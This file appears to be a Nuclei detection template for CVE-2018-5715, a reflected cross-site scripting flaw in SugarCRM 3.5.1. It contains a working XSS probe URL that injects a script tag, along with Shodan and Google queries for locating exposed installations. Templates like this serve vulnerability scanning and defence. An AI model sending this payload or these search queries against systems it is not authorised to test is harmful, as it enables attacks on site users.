nuclei-templates/http/cves/2018/CVE-2018-5715.yaml

51 lines
1.5 KiB
YAML
Raw Normal View History

2022-04-24 13:40:22 +00:00
id: CVE-2018-5715
2022-04-24 13:39:12 +00:00
info:
name: SugarCRM 3.5.1 - Cross-Site Scripting
2022-04-24 13:39:12 +00:00
author: edoardottt
severity: medium
description: SugarCRM 3.5.1 is vulnerable to cross-site scripting via phprint.php and a parameter name in the query string (aka a $key variable).
2023-09-06 12:57:14 +00:00
remediation: |
Upgrade to a patched version of SugarCRM or apply the necessary security patches provided by the vendor.
2022-04-24 23:13:37 +00:00
reference:
- https://www.exploit-db.com/exploits/43683
- https://m4k4br0.github.io/sugarcrm-xss/
- https://www.exploit-db.com/exploits/43683/
- https://nvd.nist.gov/vuln/detail/CVE-2018-5715
2022-04-24 13:39:12 +00:00
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
2022-04-24 13:40:22 +00:00
cve-id: CVE-2018-5715
2022-04-24 13:39:12 +00:00
cwe-id: CWE-79
2023-07-11 19:49:27 +00:00
epss-score: 0.00129
2023-08-31 11:46:18 +00:00
epss-percentile: 0.46905
2023-09-06 12:57:14 +00:00
cpe: cpe:2.3:a:sugarcrm:sugarcrm:3.5.1:*:*:*:*:*:*:*
metadata:
max-request: 1
2023-07-11 19:49:27 +00:00
vendor: sugarcrm
product: sugarcrm
2023-09-06 12:57:14 +00:00
shodan-query: http.html:"SugarCRM Inc. All Rights Reserved"
google-query: intext:"SugarCRM Inc. All Rights Reserved"
tags: sugarcrm,xss,edb,cve,cve2018
2022-04-24 13:39:12 +00:00
http:
2022-04-24 13:39:12 +00:00
- method: GET
path:
- "{{BaseURL}}/index.php?action=Login&module=Users&print=a&%22%2F%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E"
matchers-condition: and
matchers:
2022-04-24 23:13:37 +00:00
- type: word
part: body
words:
- '&"/><script>alert(1)</script>=&"><< Back</a><br><br>'
2022-04-24 13:39:12 +00:00
- type: word
part: header
words:
- "text/html"
2022-04-24 23:13:37 +00:00
- type: status
status:
- 200